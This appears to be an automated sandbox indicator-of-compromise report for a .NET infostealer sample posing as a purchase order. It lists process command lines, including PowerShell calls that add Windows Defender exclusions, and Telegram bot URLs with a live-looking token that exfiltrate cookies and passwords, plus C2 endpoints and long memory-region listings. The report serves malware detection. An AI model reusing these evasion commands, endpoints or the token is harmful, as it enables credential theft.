IOC Report
BQ_PO#385995.exe

loading gif

Files

File Path
Type
Category
Malicious
BQ_PO#385995.exe
PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BQ_PO#385995.exe_b974f67a2c796a6f9bd6ecce2de723dcbcdfac3_45f15e28_5f77f4b6-d5ff-4795-9efd-79a7e8533f98\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\qcbure.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF531.tmp.dmp
Mini DuMP crash report, 16 streams, Fri Dec 6 03:11:56 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF66A.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF68B.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5yievlcq.wkx.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a0kli2il.hnc.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fb1aurkj.cm3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_igpuwiqf.szw.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mk51wkjn.15f.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n1s5cd42.gfd.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_thahkatr.dzn.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u10kdqfb.sxt.ps1
ASCII text, with no line terminators
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
\Device\ConDrv
ASCII text, with CRLF line terminators
dropped
There are 7 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\BQ_PO#385995.exe
"C:\Users\user\Desktop\BQ_PO#385995.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe'
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AddInProcess32.exe'
malicious
C:\Users\user\AppData\Local\Temp\qcbure.exe
"C:\Users\user\AppData\Local\Temp\qcbure.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 7412 -s 1044
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
69.174.100.131
malicious
https://api.telegram.org
unknown
https://api.telegram.org/bot
unknown
http://crl.microsoft
unknown
https://contoso.com/License
unknown
https://www.office.com/lB
unknown
https://system.data.sqlite.org/X
unknown
https://www.newtonsoft.com/json
unknown
https://reallyfreegeoip.org/xml/8.46.123.228$
unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
unknown
https://chrome.google.com/webstore?hl=en
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:287400%0D%0ADate%20and%20Time:%2007/12/2024%20/%2000:45:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20287400%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
149.154.167.220
http://varders.kozow.com:8081
unknown
https://urn.to/r/sds_seeaCould
unknown
https://api.telegram.org/bot7721085569:AAH1tkciy-nKykIEUNjOAUsItTcvNCVmFLo/sendDocument?chat_id=6236
unknown
https://api.telegram.org/bot7721085569:AAH1tkciy-nKykIEUNjOAUsItTcvNCVmFLo/sendDocument?chat_id=6236275763&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery
149.154.167.220
http://checkip.dyndns.org/
158.101.44.242
https://aka.ms/pscore6lB
unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
unknown
http://checkip.dyndns.org/q
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:287400%0D%0ADate%20a
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://reallyfreegeoip.org/xml/8.46.123.228
104.21.67.152
https://reallyfreegeoip.org/xml/
unknown
https://www.office.com/
unknown
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
https://api.telegram.org/bot7721085569:AAH1tkciy-nKykIEUNjOAUsItTcvNCVmFLo/sendDocument?chat_id=6236275763&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery
149.154.167.220
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/Icon
unknown
http://upx.sf.net
unknown
http://checkip.dyndns.org
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=
unknown
https://github.com/Pester/Pester
unknown
http://james.newtonking.com/projects/json
unknown
http://aborters.duckdns.org:8081
unknown
http://51.38.247.67:8081/_send_.php?L
unknown
http://anotherarmy.dns.army:8081
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://www.newtonsoft.com/jsonschema
unknown
https://reallyfreegeoip.org
unknown
https://www.nuget.org/packages/Newtonsoft.Json.Bson
unknown
https://urn.to/r/sds_see
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
unknown
http://api.telegram.org
unknown
https://system.data.sqlite.org/
unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
unknown
There are 42 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
reallyfreegeoip.org
104.21.67.152
api.telegram.org
149.154.167.220
checkip.dyndns.com
158.101.44.242
checkip.dyndns.org
unknown

IPs

IP
Domain
Country
Malicious
69.174.100.131
unknown
United States
malicious
149.154.167.220
api.telegram.org
United Kingdom
104.21.67.152
reallyfreegeoip.org
United States
158.101.44.242
checkip.dyndns.com
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\4890100B551F5792D1B3
97D084DBAF65E0395221928BE84907C5DFC51D8E0B9D8C8CAD659E49E821BD61
HKEY_CURRENT_USER\SOFTWARE\4890100B551F5792D1B3
97D084DBAF65E0395221928BE84907C5DFC51D8E0B9D8C8CAD659E49E821BD61
\REGISTRY\A\{76ab1394-9640-10f2-fe43-71849bedb5bf}\Root\InventoryApplicationFile\bq_po#385995.exe|152c3674fc32928e
ProgramId
\REGISTRY\A\{76ab1394-9640-10f2-fe43-71849bedb5bf}\Root\InventoryApplicationFile\bq_po#385995.exe|152c3674fc32928e
FileId
\REGISTRY\A\{76ab1394-9640-10f2-fe43-71849bedb5bf}\Root\InventoryApplicationFile\bq_po#385995.exe|152c3674fc32928e
LowerCaseLongPath
\REGISTRY\A\{76ab1394-9640-10f2-fe43-71849bedb5bf}\Root\InventoryApplicationFile\bq_po#385995.exe|152c3674fc32928e
LongPathHash
\REGISTRY\A\{76ab1394-9640-10f2-fe43-71849bedb5bf}\Root\InventoryApplicationFile\bq_po#385995.exe|152c3674fc32928e
Name
\REGISTRY\A\{76ab1394-9640-10f2-fe43-71849bedb5bf}\Root\InventoryApplicationFile\bq_po#385995.exe|152c3674fc32928e
OriginalFileName
\REGISTRY\A\{76ab1394-9640-10f2-fe43-71849bedb5bf}\Root\InventoryApplicationFile\bq_po#385995.exe|152c3674fc32928e
Publisher
\REGISTRY\A\{76ab1394-9640-10f2-fe43-71849bedb5bf}\Root\InventoryApplicationFile\bq_po#385995.exe|152c3674fc32928e
Version
\REGISTRY\A\{76ab1394-9640-10f2-fe43-71849bedb5bf}\Root\InventoryApplicationFile\bq_po#385995.exe|152c3674fc32928e
BinFileVersion
\REGISTRY\A\{76ab1394-9640-10f2-fe43-71849bedb5bf}\Root\InventoryApplicationFile\bq_po#385995.exe|152c3674fc32928e
BinaryType
\REGISTRY\A\{76ab1394-9640-10f2-fe43-71849bedb5bf}\Root\InventoryApplicationFile\bq_po#385995.exe|152c3674fc32928e
ProductName
\REGISTRY\A\{76ab1394-9640-10f2-fe43-71849bedb5bf}\Root\InventoryApplicationFile\bq_po#385995.exe|152c3674fc32928e
ProductVersion
\REGISTRY\A\{76ab1394-9640-10f2-fe43-71849bedb5bf}\Root\InventoryApplicationFile\bq_po#385995.exe|152c3674fc32928e
LinkDate
\REGISTRY\A\{76ab1394-9640-10f2-fe43-71849bedb5bf}\Root\InventoryApplicationFile\bq_po#385995.exe|152c3674fc32928e
BinProductVersion
\REGISTRY\A\{76ab1394-9640-10f2-fe43-71849bedb5bf}\Root\InventoryApplicationFile\bq_po#385995.exe|152c3674fc32928e
AppxPackageFullName
\REGISTRY\A\{76ab1394-9640-10f2-fe43-71849bedb5bf}\Root\InventoryApplicationFile\bq_po#385995.exe|152c3674fc32928e
AppxPackageRelativeId
\REGISTRY\A\{76ab1394-9640-10f2-fe43-71849bedb5bf}\Root\InventoryApplicationFile\bq_po#385995.exe|152c3674fc32928e
Size
\REGISTRY\A\{76ab1394-9640-10f2-fe43-71849bedb5bf}\Root\InventoryApplicationFile\bq_po#385995.exe|152c3674fc32928e
Language
\REGISTRY\A\{76ab1394-9640-10f2-fe43-71849bedb5bf}\Root\InventoryApplicationFile\bq_po#385995.exe|152c3674fc32928e
Usn
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qcbure_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qcbure_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qcbure_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qcbure_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qcbure_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qcbure_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qcbure_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qcbure_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qcbure_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qcbure_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qcbure_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qcbure_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qcbure_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qcbure_RASMANCS
FileDirectory
There are 26 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
26761126000
trusted library allocation
page read and write
malicious
3475000
trusted library allocation
page read and write
malicious
402000
remote allocation
page execute and read and write
malicious
6F80000
trusted library section
page read and write
malicious
30E1000
trusted library allocation
page read and write
malicious
26760E4C000
trusted library allocation
page read and write
malicious
FE2000
unkown
page readonly
malicious
32F1000
trusted library allocation
page read and write
malicious
42FE000
stack
page read and write
4E1A000
trusted library allocation
page read and write
7259000
heap
page read and write
57D6000
trusted library allocation
page read and write
8010000
trusted library allocation
page execute and read and write
4F8D000
trusted library allocation
page read and write
6B77000
heap
page read and write
3506000
trusted library allocation
page read and write
4AEF000
trusted library allocation
page read and write
7D50000
trusted library allocation
page read and write
DC0000
heap
page read and write
2675F3F6000
heap
page read and write
42FB000
trusted library allocation
page read and write
85AE000
stack
page read and write
40E7000
trusted library allocation
page read and write
728000
stack
page read and write
7F80000
trusted library allocation
page read and write
750DBFE000
stack
page read and write
CF0000
trusted library section
page read and write
4420000
trusted library allocation
page read and write
57E2000
trusted library allocation
page read and write
709E000
stack
page read and write
5631000
trusted library allocation
page read and write
7FBA8000
trusted library allocation
page execute and read and write
57D1000
trusted library allocation
page read and write
17C0000
trusted library allocation
page read and write
378A000
trusted library allocation
page read and write
1476000
trusted library allocation
page execute and read and write
57D0000
trusted library allocation
page read and write
827E000
heap
page read and write
5810000
trusted library allocation
page read and write
769000
heap
page read and write
7170000
trusted library allocation
page read and write
7FFD9B7BB000
trusted library allocation
page execute and read and write
2675F510000
trusted library allocation
page read and write
26778E00000
trusted library allocation
page read and write
18F0000
heap
page execute and read and write
4427000
heap
page read and write
47B1000
trusted library allocation
page read and write
17C0000
trusted library allocation
page read and write
6E9E000
stack
page read and write
8AA000
trusted library allocation
page execute and read and write
83FF000
trusted library allocation
page read and write
7E34000
heap
page read and write
6BAD000
trusted library allocation
page read and write
4D67000
trusted library allocation
page read and write
CC0000
heap
page read and write
7204000
heap
page read and write
7FFD9B84C000
trusted library allocation
page execute and read and write
6DE1000
heap
page read and write
670D000
stack
page read and write
7106000
trusted library allocation
page read and write
7D22000
trusted library allocation
page read and write
7254000
heap
page read and write
31DC000
stack
page read and write
499000
stack
page read and write
46A0000
heap
page execute and read and write
D55000
trusted library allocation
page execute and read and write
7010000
trusted library allocation
page read and write
1910000
trusted library allocation
page read and write
D20000
trusted library allocation
page read and write
7201000
heap
page read and write
45FD000
stack
page read and write
AD5000
heap
page read and write
741E000
stack
page read and write
57D9000
trusted library allocation
page read and write
4906000
trusted library allocation
page read and write
6C20000
heap
page read and write
45C6000
trusted library allocation
page read and write
335B000
trusted library allocation
page read and write
57DB000
trusted library allocation
page read and write
7FFD9B794000
trusted library allocation
page read and write
6C0000
heap
page read and write
85F3000
trusted library allocation
page read and write
1932000
trusted library allocation
page read and write
7132000
trusted library allocation
page read and write
1492000
trusted library allocation
page read and write
6B90000
trusted library allocation
page read and write
6BC0000
heap
page read and write
4638000
trusted library allocation
page read and write
834D000
stack
page read and write
6BF0000
trusted library allocation
page read and write
4D6F000
trusted library allocation
page read and write
7E2F000
heap
page read and write
6D5B000
heap
page read and write
4420000
heap
page read and write
6EC000
stack
page read and write
6CAE000
stack
page read and write
5659000
trusted library allocation
page read and write
86C0000
trusted library allocation
page execute and read and write
2675F500000
trusted library allocation
page read and write
6F7F000
stack
page read and write
34D8000
trusted library allocation
page read and write
44D8000
trusted library allocation
page read and write
750D5FE000
stack
page read and write
7FFD9B934000
trusted library allocation
page read and write
4EC5000
trusted library allocation
page read and write
8B2000
trusted library allocation
page read and write
D1D000
trusted library allocation
page execute and read and write
4631000
trusted library allocation
page read and write
4319000
trusted library allocation
page read and write
711E000
stack
page read and write
26760EB3000
trusted library allocation
page read and write
824A000
heap
page read and write
2675F45C000
heap
page read and write
95F000
stack
page read and write
980000
heap
page read and write
7F0000
heap
page read and write
7040000
trusted library allocation
page execute and read and write
7FFD9B983000
trusted library allocation
page read and write
7FFD9B7BD000
trusted library allocation
page execute and read and write
43F0000
heap
page execute and read and write
1937000
trusted library allocation
page execute and read and write
6FB0000
trusted library allocation
page read and write
7170000
trusted library allocation
page read and write
6DC1000
heap
page read and write
18F0000
trusted library allocation
page read and write
8150000
trusted library allocation
page read and write
45E7000
trusted library allocation
page read and write
7CF0000
trusted library allocation
page read and write
43B3000
trusted library allocation
page read and write
6CD0000
heap
page execute and read and write
874B000
stack
page read and write
7D7C000
heap
page read and write
468A000
trusted library allocation
page read and write
83E0000
trusted library allocation
page execute and read and write
4447000
trusted library allocation
page read and write
7DB2000
heap
page read and write
7110000
trusted library allocation
page read and write
802D000
trusted library allocation
page read and write
474E000
stack
page read and write
2675F3A0000
heap
page read and write
6EAE000
stack
page read and write
1454000
trusted library allocation
page read and write
8266000
heap
page read and write
1485000
heap
page read and write
43DE000
trusted library allocation
page read and write
4660000
trusted library allocation
page read and write
7FFD9B959000
trusted library allocation
page read and write
5969000
trusted library allocation
page read and write
1690000
heap
page read and write
6CEE000
stack
page read and write
16D1000
heap
page read and write
16C4000
heap
page read and write
6F0000
heap
page read and write
680C000
stack
page read and write
17B0000
trusted library allocation
page execute and read and write
8040000
trusted library allocation
page read and write
720B000
heap
page read and write
57EA000
trusted library allocation
page read and write
7D74000
heap
page read and write
43E4000
trusted library allocation
page read and write
D00000
trusted library allocation
page read and write
372E000
trusted library allocation
page read and write
14B0000
trusted library allocation
page read and write
6E2E000
heap
page read and write
6BAB000
trusted library allocation
page read and write
1784000
heap
page read and write
70E4000
trusted library allocation
page read and write
6139000
stack
page read and write
6B97000
trusted library allocation
page read and write
DBC000
stack
page read and write
6DA2000
heap
page read and write
6D3B000
heap
page read and write
6E1F000
heap
page read and write
6D99000
heap
page read and write
721F000
heap
page read and write
6BBE000
trusted library allocation
page read and write
69EE000
stack
page read and write
7CFA000
trusted library allocation
page read and write
5A0000
heap
page read and write
6FC6000
trusted library allocation
page read and write
4EC7000
trusted library allocation
page read and write
7430000
trusted library allocation
page read and write
1578000
heap
page read and write
8B0000
trusted library allocation
page read and write
49D000
stack
page read and write
6FAF000
stack
page read and write
7D60000
heap
page read and write
7B80000
trusted library allocation
page execute and read and write
7170000
trusted library allocation
page read and write
80EF000
stack
page read and write
75A3000
trusted library allocation
page read and write
883000
trusted library allocation
page execute and read and write
750D7FE000
stack
page read and write
2675F17A000
unkown
page readonly
7030000
trusted library allocation
page execute and read and write
2675F170000
unkown
page readonly
7130000
trusted library allocation
page read and write
462B000
trusted library allocation
page read and write
4655000
trusted library allocation
page read and write
85EE000
stack
page read and write
35DE000
trusted library allocation
page read and write
6280000
heap
page read and write
167F000
stack
page read and write
5840000
heap
page read and write
D39000
trusted library allocation
page read and write
4D13000
trusted library allocation
page read and write
2675F41A000
heap
page read and write
453B000
stack
page read and write
6150000
heap
page read and write
7FFD9B940000
trusted library allocation
page read and write
33A5000
trusted library allocation
page read and write
26770DD1000
trusted library allocation
page read and write
70DD000
stack
page read and write
DD0000
heap
page readonly
7140000
trusted library allocation
page read and write
91E000
stack
page read and write
7C50000
heap
page read and write
45A6000
trusted library allocation
page read and write
8560000
trusted library allocation
page read and write
1026000
unkown
page readonly
26779670000
heap
page read and write
72B0000
trusted library allocation
page read and write
4428000
trusted library allocation
page read and write
7EE000
stack
page read and write
6DE7000
heap
page read and write
884F000
stack
page read and write
191D000
trusted library allocation
page execute and read and write
4410000
trusted library allocation
page read and write
57DC000
trusted library allocation
page read and write
7D70000
heap
page read and write
6D30000
heap
page read and write
5990000
heap
page read and write
339D000
trusted library allocation
page read and write
6A8C000
stack
page read and write
6E1E000
stack
page read and write
BB2000
heap
page read and write
83CC000
stack
page read and write
7130000
trusted library allocation
page read and write
154C000
stack
page read and write
548D000
stack
page read and write
6160000
heap
page read and write
6E5C000
stack
page read and write
6CE6000
trusted library allocation
page read and write
6BF2000
heap
page read and write
7FFD9B950000
trusted library allocation
page read and write
45E9000
trusted library allocation
page read and write
5C7E000
stack
page read and write
8229000
heap
page read and write
2675F395000
heap
page read and write
17B0000
trusted library allocation
page execute and read and write
17D7000
heap
page read and write
4DB6000
trusted library allocation
page read and write
52F8000
trusted library allocation
page read and write
72E1000
heap
page read and write
6CD5000
heap
page execute and read and write
6DDA000
stack
page read and write
7CF7000
trusted library allocation
page read and write
5FFD000
stack
page read and write
12F8000
stack
page read and write
4787000
trusted library allocation
page read and write
7620000
trusted library allocation
page read and write
33AD000
trusted library allocation
page read and write
4813000
trusted library allocation
page read and write
336C000
trusted library allocation
page read and write
464D000
trusted library allocation
page read and write
F5B000
stack
page read and write
468C000
stack
page read and write
81E0000
heap
page read and write
46F0000
trusted library allocation
page read and write
69AA000
stack
page read and write
446E000
stack
page read and write
1490000
trusted library allocation
page read and write
1904000
trusted library allocation
page read and write
80AD000
stack
page read and write
4647000
trusted library allocation
page read and write
33B1000
trusted library allocation
page read and write
595A000
trusted library allocation
page read and write
3677000
trusted library allocation
page read and write
17A0000
trusted library allocation
page read and write
8400000
trusted library allocation
page read and write
DE8000
trusted library allocation
page read and write
45BE000
stack
page read and write
6BB2000
heap
page read and write
3190000
heap
page execute and read and write
57FD000
trusted library allocation
page read and write
6F90000
trusted library allocation
page read and write
6DBD000
heap
page read and write
7610000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
43D6000
trusted library allocation
page read and write
7B9B000
trusted library allocation
page read and write
3395000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
11B7000
stack
page read and write
4582000
trusted library allocation
page read and write
4402000
trusted library allocation
page read and write
7D84000
heap
page read and write
6CF0000
trusted library allocation
page execute and read and write
6DEE000
stack
page read and write
443F000
trusted library allocation
page read and write
7FFD9B7EC000
trusted library allocation
page execute and read and write
4551000
trusted library allocation
page read and write
813E000
stack
page read and write
4586000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
45B4000
trusted library allocation
page read and write
26760E32000
trusted library allocation
page read and write
6BA0000
trusted library allocation
page read and write
810E000
stack
page read and write
8000000
heap
page read and write
71FD000
heap
page read and write
81C2000
trusted library allocation
page read and write
33A1000
trusted library allocation
page read and write
176C000
stack
page read and write
1926000
trusted library allocation
page execute and read and write
7FFD9B850000
trusted library allocation
page execute and read and write
44A8000
trusted library allocation
page read and write
4557000
trusted library allocation
page read and write
7D8C000
heap
page read and write
4674000
trusted library allocation
page read and write
349A000
trusted library allocation
page read and write
D30000
trusted library allocation
page read and write
1950000
heap
page read and write
7A0000
heap
page read and write
169E000
heap
page read and write
6E71000
heap
page read and write
40E1000
trusted library allocation
page read and write
6FDD000
trusted library allocation
page read and write
2675F390000
heap
page read and write
1903000
trusted library allocation
page execute and read and write
44FD000
stack
page read and write
1640000
heap
page read and write
754D000
stack
page read and write
6CBB000
stack
page read and write
1800000
heap
page read and write
7DD7000
heap
page read and write
709E000
stack
page read and write
1930000
heap
page read and write
880000
trusted library allocation
page read and write
6C6D000
stack
page read and write
7FFD9B790000
trusted library allocation
page read and write
75B0000
trusted library allocation
page read and write
26760DD1000
trusted library allocation
page read and write
5D2F000
stack
page read and write
7FFD9B954000
trusted library allocation
page read and write
46EC000
stack
page read and write
7C60000
trusted library allocation
page execute and read and write
1930000
trusted library allocation
page read and write
DC7000
heap
page read and write
1960000
heap
page read and write
4109000
trusted library allocation
page read and write
6F8000
heap
page read and write
3649000
trusted library allocation
page read and write
6BEE000
stack
page read and write
1658000
heap
page read and write
7427000
trusted library allocation
page read and write
360E000
trusted library allocation
page read and write
5820000
trusted library allocation
page read and write
CBD000
stack
page read and write
878E000
stack
page read and write
58AD000
stack
page read and write
40A000
remote allocation
page execute and read and write
3364000
trusted library allocation
page read and write
4124000
trusted library allocation
page read and write
6F70000
trusted library allocation
page read and write
457C000
trusted library allocation
page read and write
4EE7000
trusted library allocation
page read and write
43B1000
trusted library allocation
page read and write
190D000
trusted library allocation
page execute and read and write
2675F3F0000
heap
page read and write
5961000
trusted library allocation
page read and write
6B80000
heap
page read and write
37E7000
trusted library allocation
page read and write
51A6000
trusted library allocation
page read and write
70F0000
trusted library allocation
page execute and read and write
4699000
trusted library allocation
page read and write
4422000
trusted library allocation
page read and write
57E9000
trusted library allocation
page read and write
449F000
trusted library allocation
page read and write
466E000
trusted library allocation
page read and write
7E46000
heap
page read and write
4DA1000
trusted library allocation
page read and write
26770DD7000
trusted library allocation
page read and write
2675F5B0000
heap
page execute and read and write
57E1000
trusted library allocation
page read and write
57B1000
trusted library allocation
page read and write
D7C000
stack
page read and write
36A4000
trusted library allocation
page read and write
77E000
heap
page read and write
6FF0000
trusted library allocation
page read and write
7F300000
trusted library allocation
page execute and read and write
6EF8000
heap
page read and write
701E000
stack
page read and write
7135000
trusted library allocation
page read and write
15D2000
heap
page read and write
5EFE000
stack
page read and write
7420000
trusted library allocation
page read and write
37B8000
trusted library allocation
page read and write
3368000
trusted library allocation
page read and write
86F000
stack
page read and write
1430000
heap
page read and write
7210000
trusted library allocation
page read and write
435D000
trusted library allocation
page read and write
6D2F000
stack
page read and write
2675F530000
heap
page execute and read and write
2675F360000
heap
page read and write
6B5E000
stack
page read and write
6E16000
heap
page read and write
D13000
trusted library allocation
page execute and read and write
6BB4000
trusted library allocation
page read and write
43CA000
trusted library allocation
page read and write
15E3000
heap
page read and write
3700000
trusted library allocation
page read and write
7FFD9B792000
trusted library allocation
page read and write
1463000
trusted library allocation
page read and write
4F45000
trusted library allocation
page read and write
4D63000
trusted library allocation
page read and write
31E0000
heap
page read and write
4620000
heap
page read and write
8170000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
527E000
stack
page read and write
44E4000
trusted library allocation
page read and write
71C000
heap
page read and write
3170000
trusted library allocation
page read and write
DC0000
trusted library allocation
page read and write
83F0000
trusted library allocation
page read and write
1500000
heap
page execute and read and write
34D4000
trusted library allocation
page read and write
7100000
trusted library allocation
page read and write
D4A000
trusted library allocation
page execute and read and write
5215000
trusted library allocation
page read and write
4C51000
trusted library allocation
page read and write
47A0000
heap
page read and write
4FD7000
trusted library allocation
page read and write
6D70000
heap
page read and write
D52000
trusted library allocation
page read and write
7B9D000
trusted library allocation
page read and write
8163000
trusted library allocation
page read and write
7D40000
trusted library allocation
page execute and read and write
569D000
trusted library allocation
page read and write
8150000
trusted library allocation
page read and write
1480000
heap
page read and write
75E0000
trusted library allocation
page read and write
15A4000
heap
page read and write
6BE5000
trusted library allocation
page read and write
7050000
trusted library allocation
page execute and read and write
70C0000
trusted library allocation
page read and write
32EF000
stack
page read and write
85F0000
trusted library allocation
page read and write
145D000
trusted library allocation
page execute and read and write
5949000
trusted library allocation
page read and write
D70000
trusted library allocation
page read and write
55E000
stack
page read and write
6CEE000
stack
page read and write
457E000
stack
page read and write
75A0000
trusted library allocation
page read and write
581D000
trusted library allocation
page read and write
5AE0000
heap
page execute and read and write
18D0000
heap
page read and write
169A000
heap
page read and write
14A5000
heap
page read and write
4D6B000
trusted library allocation
page read and write
B48000
heap
page read and write
8274000
heap
page read and write
884000
trusted library allocation
page read and write
83CE000
stack
page read and write
7224000
heap
page read and write
356F000
trusted library allocation
page read and write
3110000
trusted library allocation
page read and write
603C000
stack
page read and write
478E000
stack
page read and write
43E6000
trusted library allocation
page read and write
7FFD9B7AD000
trusted library allocation
page execute and read and write
15A7000
heap
page read and write
1420000
heap
page read and write
4313000
trusted library allocation
page read and write
3160000
trusted library allocation
page execute and read and write
4BAD000
trusted library allocation
page read and write
D20000
heap
page read and write
17D0000
heap
page read and write
3180000
trusted library allocation
page read and write
724E000
heap
page read and write
D27000
heap
page read and write
1495000
trusted library allocation
page execute and read and write
2675F625000
heap
page read and write
6EDB000
stack
page read and write
334E000
trusted library allocation
page read and write
5D7F000
stack
page read and write
83F9000
trusted library allocation
page read and write
989000
heap
page read and write
72A0000
heap
page execute and read and write
814E000
stack
page read and write
6D5E000
stack
page read and write
44AA000
trusted library allocation
page read and write
4567000
trusted library allocation
page read and write
4631000
trusted library allocation
page read and write
192A000
trusted library allocation
page execute and read and write
7FFD9B98B000
trusted library allocation
page read and write
1553000
heap
page read and write
5E7E000
stack
page read and write
4D7C000
trusted library allocation
page read and write
70F0000
trusted library allocation
page read and write
7E11000
heap
page read and write
147E000
stack
page read and write
6F80000
trusted library allocation
page read and write
70DF000
stack
page read and write
6B2E000
stack
page read and write
6B69000
stack
page read and write
74CF000
stack
page read and write
6CAE000
stack
page read and write
5843000
heap
page read and write
14A0000
heap
page read and write
8190000
trusted library allocation
page execute and read and write
6DD2000
heap
page read and write
57DE000
trusted library allocation
page read and write
175F000
heap
page read and write
56BD000
stack
page read and write
6377000
heap
page read and write
4555000
trusted library allocation
page read and write
6B70000
heap
